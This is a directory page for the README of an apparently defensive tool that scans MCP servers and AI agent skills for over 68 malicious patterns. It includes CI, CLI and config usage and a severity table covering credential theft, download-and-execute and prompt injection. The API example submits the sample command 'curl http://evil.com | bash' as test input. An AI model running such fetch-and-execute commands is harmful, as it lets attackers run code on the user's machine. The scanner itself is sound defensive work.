Skip to main content
Glama
deenesjakoruzh
eltociear

mcp-security-audit

by eltociear
OverviewSchemaRelated ServersScoreDiscussions
Python
Local

mcp-security-audit

扫描 MCP 服务器、AI 智能体技能和插件,检测包括凭据窃取、提示词注入、代码执行、助记词收集等在内的 68 种以上恶意模式

三种使用方式:

1. GitHub Action (CI/CD)

添加到你的工作流中以自动扫描 PR:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'

使用 SARIF 上传(在 GitHub 安全选项卡中显示扫描结果):

      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx mcp-security-audit --path ./server.py

# Scan a directory
npx mcp-security-audit --path ./mcp-servers/

# JSON output
npx mcp-security-audit --path . --json

# SARIF output
npx mcp-security-audit --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH

或全局安装:

npm install -g mcp-security-audit
mcp-audit --path ./server.py

3. MCP 服务器 (Claude Desktop / Cursor)

添加到你的 MCP 配置中:

{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

然后询问 Claude:“Audit this MCP server for security issues”(审计此 MCP 服务器的安全问题)

检测内容

严重程度

模式

严重 (CRITICAL)

下载并执行、凭据窃取、密钥生成、敏感目录写入、助记词收集

高 (HIGH)

外部下载、技能安装、任意代码执行、身份验证绕过、身份冒充

中 (MEDIUM)

未知 API 调用、数据收集、权限提升、混淆、提示词注入

低 (LOW)

外部 URL 引用、广泛的文件系统访问

风险评分

  • 0-10: 安全 (SAFE)

  • 11-25: 低 (LOW)

  • 26-50: 中 (MEDIUM)

  • 51-75: 高 (HIGH)

  • 76-100: 严重 (CRITICAL)

API

该扫描器也提供付费 API:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

许可证

MIT

This server cannot be installed

A
license - permissive license
-
quality - not tested
B
maintenance

How are these scores calculated?

Maintenance

Maintainers
Response time
Release cycle
1Releases (12mo)

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/mcp-security-audit'

If you have feedback or need assistance with the MCP directory API, please join our Discord server